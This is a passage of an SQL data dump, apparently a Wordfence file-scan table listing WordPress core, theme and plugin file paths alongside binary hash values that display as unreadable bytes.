�@���L�jw�','',0,'?'),('_�#��U1p�GS�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z���rt��w��(�e','�ҿD�I<�^�i2dW�]G�_�-+�A8�W','',0,'?'),('_%���=�*I�I+nd','wp-includes/wp-includes/SimplePie/Rating.php',0,'�jkB�-\r?Q3Qw�U7','�jkB�-\r?Q3Qw�U7','{nH�(>}Q(����a�����b�>��\n�FY+','',0,'?'),('_\'y�ϼ(uf����Nf','wp-content/themes/pine/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���%8��߰�B_k�{�','�!�*iZ�.����{I.���L>���s��էP','',0,'?'),('_/dyY�\r�}$ʓ��','wp-content/plugins/wp-cerber/assets/flags/ni.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\0�MZsu���/��','�Cd0���HF|�\ne��ʅ�p�_�SӲ@\0@1<ۊ','',0,'?'),('_4���}3���{lX��','wp-content/themes/spidermag/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Zq��ҤJ��','}Z���~�pˠ߸��k}��\\*�����\ZGK�','',0,'?'),('_@�\09�m-|gA���6','wp-content/themes/promote/inc/kirki/includes/field/class-kirki-field-color-alpha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J���>T�If�jl�`','RPB�6W\Z\n���t�\"l�1��]�L�\ZZ9i�o','',0,'?'),('_B��\0��r�p�Iu��','wp-content/themes/twentynineteen/sass/variables-site/_structure.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O�!��Y�r8ܗt/�','=�\0t��d\n�J��e�ܐ��Z<��s�n6��t�','',0,'?'),('_R\"v��\'O�@','wp-content/themes/anima/includes/landing-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�����Ћ��>%','0��F^����R\nJ$�霁yv�.��D2k','',0,'?'),('_Tl��z�kft!�','wp-content/themes/auberge/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&���C�qے����','���Hy����9m��u���+4I�릇{','',0,'?'),('_Uc���\n��K�j�','wp-includes/wp-includes/random_compat/byte_safe_strings.php',0,'�[Bң�J�Ԉ�;','�[Bң�J�Ԉ�;',']�Q�˄=Pݵu�Q��{>ϐ���','',0,'?'),('_^���\n���O@b�\0','wp-content/themes/promote/inc/kirki/assets/js/functions/validate-css-value.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|=do$/r�b˖�s','�}� E��gv<�3HI.Qaq�������zU','',0,'?'),('_j��_��/���yӱ','wp-includes/load.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x8�7n�LH�g�gf�R','ŗْl5�������Xt�����C�\n�mA','',0,'?'),('_jO�� ��77.�nln','wp-content/themes/capacious/assets/js/owl.carousel.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R���lvg���n��','\"�g����O�Nd���Z�m{x�%��@|:w�','',0,'?'),('_�O8�)\r�`�','wp-content/themes/advance/images/search.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4\'�b�$l����l','�+8��W �.���:���}A�������:��','',0,'?'),('_�f�>��*��_\n','wp-content/plugins/wp-cerber/assets/flags/ru.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���q���j�/�53\r�','�z\rf�/���x�.��5Q&i�HCn�0�','',0,'?'),('_��mY2,6�Y\0\\9��','wp-content/themes/Endolf/comments.php',0,'�Yc}����*�','�Yc}����*�','\\|��[�:|#-J��8�*��k����Юޕ','',0,'?'),('_��[��_=�jr+�\Z\rA','wp-content/themes/advance/inc/kirki/includes/class-kirki-explode-background-field.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�P^�O�\'��zf��n','dD@w��C��v��ELgR��_��TF�?DWu','',0,'?'),('_�O�$^����5��','wp-content/plugins/wp-cerber/assets/ui-stack.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#`LZ)�pd��','Ɉ���H���R�{(~\0*8���!�^�u�','',0,'?'),('_�����,�?��L�u�','wp-content/themes/spidermag/spidermag/customwidget/widget-thirdblock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(��>�&�V$� Э\'','Upq|��JU�U����<�����Yl�t','',0,'?'),('_�\0>Orm��e�m�','wp-includes/wp-includes/widgets/class-wp-widget-search.php',0,'��}��z�Ys��]�','��}��z�Ys��]�','H:�wn����n8V��9�\'�tLYƭBq����','',0,'?'),('_Н�b�i�8�Ӏ�MTu','wp-content/themes/skt-pathway/images/slides/slide2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J���r^V��0�N','�KY�n�Q�i(�Wv.T��,�Y� �r�}�v','',0,'?'),('_�|��T�M^���J','wp-includes/css/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p^�,f�ޡ�����I{�','��i�4�j�v�J5�d���߲TP��L�/��7�','',0,'?'),('_��4�3���=��','wp-includes/images/uploader-icons.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\M�����m��','�p����+/������i��!Z�ţ6�m�','',0,'?'),('_�(�C���M6�9�','wp-admin/includes/class-wp-links-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�6�Z3@][:����+','A���D��c?��L���I�OB��Oß��L','',0,'?'),('_�cS�S{��2�_','wp-content/themes/storeone/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ख़��8 _\ZG���',']���i1���l.���_��%�<��JI�s*','',0,'?'),('_����8}���?�','wp-includes/css/media-views-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m���X�Н�KH�Os8�',')�Z\\��^��hG*y����2Ԏ�k]䜹Yu�5*','',0,'?'),('`6˻0�ܮ�{�[+','wp-includes/wp-includes/images/smilies/icon_twisted.gif',0,'L��v[?��+*8��;�','L��v[?��+*8��;�','V�H�hK�����\n���p�����;.�&/E�','',0,'?'),('`���J�KK�-�إ�^','wp-content/themes/Kent/FT/plugin/options-framework/js/options-custom.js',0,'=�u�v����\nd��','=�u�v����\nd��','/���!���w�+�Č cc\\�֎8�a0J�P<D','',0,'?'),('`��S�`NI�^G�','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�i@�G�g��0�p','G��<�/�14Ņ�L��5�������!','',0,'?'),('`%�ֽ�j��\'��P��','wp-admin/js/edit-comments.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0K@�n��d�Œ�Ψ�','��-(j�e�Q5���3��\0`NJ�b�(OS�:b','',0,'?'),('`fJl�����\n��','wp-includes/wp-includes/js/plupload/wp-plupload.js',0,'K%A�};܃q:{��','K%A�};܃q:{��','+8k�����/S*15xB�L6R�P���4�5�','',0,'?'),('`��o�\'�c?��/ �','wp-content/themes/twentynineteen/template-parts/header/entry-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:�-�mם�]�','�I\Z�{��!��M}OL�bdpO���hV�Û�','',0,'?'),('`��gf�W�\n&OPw','wp-content/plugins/wp-cerber/assets/flags/sg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*F��Y����K� a','Ԩ��Vm�f��Ek$��;]N_q�^�4����(�','',0,'?'),('`��\n���2����','wp-admin/css/code-editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���V��DBQVgF','w��86=�ݔ����2�\rD%V��E5�S� �T�','',0,'?'),('`��x�t����\'�r�[','wp-content/themes/advance/inc/kirki/assets/scss/controls/repeater.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��L���.ؽa\0�|','As�r8;���sMk�0=]�q!�a�;�:��\'','',0,'?'),('`���#��Q�?>6)','wp-content/plugins/wp-cerber/assets/flags/fk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�OwB<����oa9�E�','�k��؊�2��M&C9�&0d�Hl��q~9q','',0,'?'),('`�a�(�g��\"��','wp-includes/js/dist/html-entities.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�$�G��P^3�̎�','���0u�E��w��>�v�L���Qݓ��q','',0,'?'),('`�!Y̦��:�/�͵�F','wp-content/themes/cactus/assets/css/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('`�c0���\\���3�','wp-content/plugins/wordfence/lib/Diff/SequenceMatcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' >�U6ƪg��v�f','R�&sX$6#���_��ν�J�|�b0�o','',0,'?'),('`��6�<��4~I�Q','wp-content/themes/skt-pathway/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�·��C^������F','xM �\r?t(쀎���ǂi���ᝋHn���','',0,'?'),('`��Q&���V9zI�','wp-includes/wp-includes/images/wpspin-2x.gif',0,'mS������y\"C���','mS������y\"C���','��66S�X������6O}�4>�p�\"���\'1','',0,'?'),('`�4W�\r��ݚ[}�=�','wp-includes/wp-includes/css/wp-embed-template.css',0,')I+�w2�h���K\"�',')I+�w2�h���K\"�','�6&�}�ok��AM\Z> �|�F�6,e�t\rPq','',0,'?'),('`薡Ǹ��f�� Q�R','wp-content/themes/spidermag/assets/library/respond/respond.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�v|�����ב\'�','�i�CPE#�l�f��H��H�0�sքXk','',0,'?'),('`���;�\"�-���+~;','wp-includes/js/tinymce/plugins/media/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#@,�4dG��M','XHx����0�֍X�\Z���OG��|�{�F2','',0,'?'),('`�}+�6�L-q[��$','wp-includes/sodium_compat/src/Core32/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1�`���0�����','�qƖ����%/�y�g�rwÛ�\r�LR>=Y','',0,'?'),('`�u���Ѷ��~��','wp-content/themes/promote/inc/kirki/assets/scss/controls/dashicons.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r/\Z�5��S������','�G��\"�]icsҺ���҂�ڒ�(���','',0,'?'),('`��U�2���mdW','wp-includes/class-wp-customize-nav-menus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�8û�Td�h9�\Z','��g�n\\�y|�TR�xF����\\��A��&7֏�d','',0,'?'),('a\0R��*@ ���\\O','wp-content/themes/hueman/functions/czr/modules/modules-resources.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LidaѺ��\\��\r�b','J//�g�����Y[bO�蚙��%[����t��','',0,'?'),('a�)6����ю�','wp-includes/js/plupload/moxie.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#C\r��5DZ�ǒ����','����I�9_/x�t5���(�.g�tT\Z}&���','',0,'?'),('a\rޥ�a^��6�� 4^','wp-content/themes/advance/page-full_width.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n$uo�w�Y5�2��','��\0ܗN���K(�b��;�{�ΐ��,���','',0,'?'),('a�����2���*s','wp-includes/wp-includes/css/dist/block-editor/style.min.css',0,'݁mz���O���ya*p','݁mz���O���ya*p','��&aX�\n��q�E�D������$3Gt���','',0,'?'),('a${�҉ʻ͚�ׄ','wp-content/themes/event/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C�mfjӇ}�y�q�','=���#ER�?�5�CҎ&���\02��B���','',0,'?'),('a)�TMW�Oo��Q�|�','wp-admin/images/media-button.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����6@p�z^ye��','_\Z���SjזY ����V�Z��Gen�_','',0,'?'),('a*�b���6�n��H','wp-content/themes/kidzoo-lite/inc/theme-customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��hD�j�dFC��x���','�����IV����h�ٙ4}X�߰�|��\nLr','',0,'?'),('aLS�l%|��������','wp-content/themes/vision-lite/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�O���aw�&.��','�簞����zK/�#@J�D��#R�N�@V�|','',0,'?'),('a\\c,I\"5T��#̋�','wp-admin/images/media-button-music.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4^&$o��uf&�','�wWd¼8P�F6�A����ܴ�to-��X\\��a$','',0,'?'),('akJ�\Z���[�tx9BP','wp-includes/wp-includes/js/tinymce/plugins/colorpicker/plugin.min.js',0,'Ͷ���U裦�h�','Ͷ���U裦�h�','��ehӧ�&έ��A�3�+WTh��\n\Z)�?��','',0,'?'),('axީ��@��f[��T','wp-content/themes/Endolf/ft-options.php',0,'M�W��7�H�S[�X;�','M�W��7�H�S[�X;�','����p~�jC��4�w�`�F@An���e4','',0,'?'),('a�����|�f6��{�','wp-includes/wp-includes/js/tinymce/plugins/wpdialogs/plugin.js',0,'�We⎆?��N��t','�We⎆?��N��t','n4��<��Fz������_�5��kig�','',0,'?'),('a�S�ڑ�K��d� [S','wp-content/themes/promote/inc/kirki/assets/images/kirki-toolkit.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l)����.���5��@','�������th}�9r��N�f��s+k����8','',0,'?'),('a�A�\'�Eǡ�\r�6� �','wp-content/themes/weblog/acmethemes/customizer/feature-section/feature-category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q���L\n܆���','E���,*�ο��J���W;t���!���G}','',0,'?'),('a���γo��q�\"�','wp-includes/wp-includes/http.php',0,'�-��X㑩��/��2','�-��X㑩��/��2','? *�~HxJF�z����h�mp�ǖ}����','',0,'?'),('a��6-�z3g~��I?�4','wp-content/themes/weblog/acmethemes/hooks/dynamic-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vmB\n�����|#�R','S{Q��.뗜�����C�aQ����Z8e��','',0,'?'),('a�?��_�ˢ��6j��X','readme.html',0,'c��P���n�HH˭�','c��P���n�HH˭�','8�� 8�9��(L��:v�2l1�TSV����','',0,'?'),('a�J��r���&�-D�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��o��}S}���8.','�$��s�����?;f�Ġ=`\r� ��&��!','',0,'?'),('a����(m�EB�l�','wp-includes/media-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]p�uA@j4� k','|p��!NR�o�*mc�>�8��t���f5-\Z;m6','',0,'?'),('a�c�CH\r��=l@ĸ','wp-admin/plugin-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�D���w�o��}�D',' e�S�\nyp|Y��*h�.���ѽ�ʆX','',0,'?'),('a�~*k`D�np�}��f','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+f)��W;kgWJ��','�`�%��qY2��ʌ��?ǽ����ͷ]���','',0,'?'),('a֚�ʃ��?B�a�*�','wp-content/themes/newsmag/assets/vendors/owl-carousel/owl.theme.default.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S*��/Z��x��78W','Y:o�YE�`�\\_��>@��T�i,O�;����','',0,'?'),('a�0�}�踀�@���~','wp-content/themes/twentytwentyone/template-parts/footer/footer-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fB��RJ���z�L���','�b\n=W��p�����=����3���9�\"֗;','',0,'?'),('a�ai�G����}��\Z �','wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Э�bJ������\r%','�*��>}6��?j-9�N�AJ|�r���w�d�','',0,'?'),('a�&S���T�\"�l�9','wp-content/plugins/wp-cerber/assets/inspector.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zn�d���*k��P�j','� �o���7Xv�o\ZC�D�j����p��','',0,'?'),('a��-�b��$G�Ι','wp-content/plugins/wp-cerber/assets/flags/sh.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U�{ͤ�:u�d�','�R<,l��I@�X�ߠ.#pF�g�%1O���6�','',0,'?'),('b\0��\0�+m\0Z]��','wp-content/themes/hueman/assets/front/img/sidebar/s-right-dual-full-expand.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k ϴ��2���:�D�','~$���^��&F#�|H�o�K���X�!����','',0,'?'),('b����9W�.�k','wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-select-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ug��Y��x�=|�%{�','a�ed$Y��9XGZ(!��uFC����B���=','',0,'?'),('bH�D�0�E\'�','wp-content/themes/travel-stories/images/quotes.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��>�6��P�I�4Pg','wB2s7:<\r~�*O���cewp�1�y��Z','',0,'?'),('b�D�JD�J|��/�wk','wp-includes/wp-includes/js/tinymce/plugins/lists/plugin.js',0,')�r?�N�ぼI��q\'�',')�r?�N�ぼI��q\'�','%�=r������d��v\n��i�z�x�u��)3p','',0,'?'),('b*J{qd<�6Ui�q�','wp-includes/wp-includes/images/crystal/default.png',0,'A�>)*/��!�-�','A�>)*/��!�-�','���n$���_�u �$Q3��E�r�|Jm�','',0,'?'),('b3�\r��\n!��蕛�','wp-content/themes/storeone/template-parts/home-testimonial.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'��c±��_P�c�','�|f�x�#SӼG\0�7�9��\0����̥/&','',0,'?'),('b8��ޡ&��I��','wp-includes/wp-includes/sodium_compat/namespaced/Compat.php',0,'A�i�k�/��j\rn�3','A�i�k�/��j\rn�3','1�\'����ջ.�O��}5�Afi�~��>�:}s','',0,'?'),('b;�XE��0�]*m#C��','wp-content/themes/advance/inc/kirki/includes/settings/class-kirki-settings-repeater-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�O�l��k��','����#9�K��K&QJ�A�s�ȁ�G�4z#�','',0,'?'),('b<7H \"J�;���','wp-content/themes/auberge/library/css/admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ŷ.�r��L̂�','&\n��X�W*~�IvD��l1W>�ۤ�?(�o�x','',0,'?'),('b=���N���PCIҘX','wp-content/themes/Kent/timthumb.php',0,'h��p�_��L�g&���','h��p�_��L�g&���','���=!�>$N:\n>rU1�^މٝ�@���.@','',0,'?'),('bDQԇ���p5�t�d�y','wp-includes/wp-includes/js/codemirror/htmlhint.js',0,'�2�|џ�G�MtP5��','�2�|џ�G�MtP5��','\0U[\0�M\'mCռ5��5k`����5�ё','',0,'?'),('bT��9W><�]y��Ue�','wp-includes/wp-includes/https-detection.php',0,'x�5\\�r���(�W','x�5\\�r���(�W','W�|�_`|\\��y{4�N���Vp����j[','',0,'?'),('bY�,��ϥY�r�;�','wp-includes/js/crop/cropper.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ky5�ni*M(��','�ٸ�T��ޝO���wL��y=}�gTl������','',0,'?'),('b};�U��K������','wp-content/themes/spidermag/assets/css/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[��W�������','i���8�Zv�\0![��[jB��ލg\"%Z���','',0,'?'),('b���9���GQE��ґ','wp-content/plugins/wp-cerber/assets/flags/lv.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.���JqW6A���`>','�\0���jn!-xv��+u�j��D���<�7!�5�#','',0,'?'),('b���.ӛ����','wp-content/plugins/wp-cerber/assets/flags/om.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r]-�K��K<ݳ�8�','�;�8K�KI�k�O�[��\0v�U[JR$ ��','',0,'?'),('b�:FQV�n�����[','wp-content/themes/showcase-lite/images/list-arrow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���q|�����p���','�m�dw��[���I�6��YS%�{�BMk�V�','',0,'?'),('b��HV��mA �Mh�\"�','wp-content/themes/twentytwenty/assets/images/2020-square-1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ܴ���6T�k�x','�L�w%���7�M��ȴ�x� � >��?\\�','',0,'?'),('b��g�c��j�W*�','wp-content/themes/anima/resources/styles/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Tq��g���Wˮ�.�','<|����h���n\r��r2P2b��F��Y4G�(�','',0,'?'),('b�09PR����}¸','wp-content/themes/newsmag/assets/css/style.css',0,'����xq0��K�yD�}','����xq0��K�yD�}','0ݙ!A��MsB��k&[8�\Z�Zn;�Pk��s�','',0,'?'),('b��,\\8�#���','wp-includes/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php',0,'��SG��˺��F���','��SG��˺��F���','[�(��R�������$��2o���t�b��','',0,'?'),('b�����o�Rx�@�','wp-content/themes/spidermag/template-parts/related-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���W<���/���P','!W�E�DZ�O�u+Ǭ��˙�Ԝ�;D��>','',0,'?'),('b���f�wis�A\"V>�L','wp-includes/wp-includes/widgets/class-wp-widget-text.php',0,'��;���\r9!�5�P�','��;���\r9!�5�P�','Y����7%��Z�Gݠ\Z��ӊr�cI�ϸ','',0,'?'),('b���HzfW����gw�','wp-content/plugins/wordfence/lib/wfSchema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�@���� �|���O�','g�v����K%��oiS�7�.�]�siH��2:p','',0,'?'),('b�,[�\\����u��','wp-content/themes/advance/inc/customizer/panels.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y*\r�y�Y��O\"uEB�','�6����\0�#T���h��V�P\'u���','',0,'?'),('b��Z�/���7X��?','wp-content/themes/advance/inc/kirki/includes/styles/class-kirki-styles-output-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h��B�9d�\n�0��','��h��@���|�8��Z���Lni9��ʷ','',0,'?'),('b���Ҍ &�?�{','wp-includes/js/customize-loader.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�����#�5&*�o�','�<ş;\r#8�+=dK���F�S)8�׆>]�','',0,'?'),('b�+ƴݟ�3�','wp-includes/customize/class-wp-customize-nav-menu-location-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��U!��s^�7�L',';��lϓ�b^�����0�(�@�L�#B��','',0,'?'),('bK�+x����wF','wp-admin/css/site-health.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ç4�[�J��#�\'�','/˵t�?���;�!�o��Q$fm<L^��6E\r��x','',0,'?'),('b�� �%b�<H�H1-*�','wp-content/themes/advance/images/list_type.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';H�(En��5��=G�','�\"I�Lh|cc5a��h#r���\Zɫ���','',0,'?'),('c餟��(Ok1�!͂','wp-admin/privacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C��W�\r��p4>9Z','*MY��P0������+5~���!�9OR�mҩ','',0,'?'),('cr�e��/�3J�\Z','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y������)y1kREX','�_����۪�B��b�k�\Z����Y�H��p�','',0,'?'),('c�4L]�˞��Mc','wp-admin/includes/class-wp-post-comments-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@d�B��#�&&��','{��bk��\r���}� {=��\\�=6�`l�� ','',0,'?'),('c���p �PU3/�','wp-content/plugins/wordfence/modules/login-security/classes/model/request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&ܮM���,~/���r','F;���W]��&��z~o\'�/��q�+��','',0,'?'),('c\Z��R�ѷ�o�v[LA�','wp-content/themes/wp-barrister/sidebar-alt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�S\0u�jl\ZP���','&$=lT��5��.���Sc���ڪ( Ծ��N','',0,'?'),('c%a��H�����','wp-admin/images/about-color-palette-vert.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�A�6���q�]�','�^��5P���n��>��:�����,G�I�z�R�','',0,'?'),('c(��C!gS?�V�/4<','wp-content/themes/anima/admin/images/3cSs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z���\n��� ��3&','�4ӿ�@�r \r�T��.>�5��Ƭ','',0,'?'),('c)v�\'*1K9{\Z3n','wp-content/themes/anima/admin/images/3cSr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#ˮƶ�d�@����',',(2`��\ro���M���r��\\d?�� ��u�9��','',0,'?'),('c,���[xޫ�3�\n�@','wp-includes/js/jquery/jquery.masonry.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@`���&n|�}A��','�\\ۙ���� }M�g� �$�0� [���B','',0,'?'),('c42j���x�c��d','wp-includes/Requests/Session.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7��݆��Ζ���}l�','e`݆�.�:��j�E�\Z�Ұ���5�\Z�)','',0,'?'),('cV����ȮX������=','wp-content/themes/skt-pathway/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gr��T����sL','k����7�EB:Z|�J����Z�` ���','',0,'?'),('cm;�� �v%�@��b(','wp-content/themes/event/page-templates/event-corporate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���I�L� �z�','M���k�e\\����[�A�ev��W\0��^�\\','',0,'?'),('c��E�cc�/2��F','wp-content/plugins/wp-cerber/assets/flags/ba.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S߫��ܟ�]�A;\Z���','\Z2��u2S��9{��Ө�G�D�+�����1�','',0,'?'),('c�-G�@�m� W�/�#|','wp-content/themes/Endolf/FT/plugin/options-framework/includes/class-options-framework-admin.php',0,'ފX�qq�&zʭw�','ފX�qq�&zʭw�','��AQ��#F���fScI�m�|80��n�','',0,'?'),('c� �]�- ���tϠ','wp-includes/wp-includes/feed-atom-comments.php',0,'��\\�I�6bJ�i\"m��','��\\�I�6bJ�i\"m��','+.4�0�I�g�(��b��}���yтK��kb�5','',0,'?'),('c�Q��i�����Qv','wp-includes/css/dist/editor/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','հv��}�Ifs��>�','�J����Tc68H�\Z�s\'9]�6�p���4d','',0,'?'),('c�\Zj<�Fh���Q�%�','wp-includes/wp-includes/js/tinymce/utils/form_utils.js',0,'���l�U��T����Li','���l�U��T����Li','vL���us<*r�WҪ����.\0|�Rg����','',0,'?'),('c�z[��BE�lb|��','wp-content/themes/maxbusiness/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3$w\'!���K!쳽�~','��U�SǴkc��/�kn�q{nA�`�n�.�$�R','',0,'?'),('c�\\F7��,�:LT��','wp-content/themes/pine/admin/css/pine-editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8I��::���W3','�a��$\\:Q?s�aƮY���?a�Ep����','',0,'?'),('c��z8��5Y���','wp-content/plugins/wp-cerber/assets/flags/pr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����M�_6�p�tz','n��S�X��\Z�h�m2��9��q���\Z�Z','',0,'?'),('c�c��q�53�<B�','wp-content/themes/wp-barrister/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ߋ���8T9�-�u�Yl','�\"fF)5T�L��Y\"�xl�Ȧԝ3N$虰1:','',0,'?'),('c�c������gu���','wp-content/plugins/wordfence/vendor/geoip2/geoip2/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��8e_�T��ƽW','ݬ�IS�P\"�a�� 7J�6�QSv���_��y�','',0,'?'),('c�NR���U�юnY$','wp-content/themes/spidermag/spidermag/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#���>8�9�6���','H�1o�wʟk�X�د�e����)�u8','',0,'?'),('c��[b]��ݽ�JF','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I]�U�� X�g����','�T�Ϛ-�1 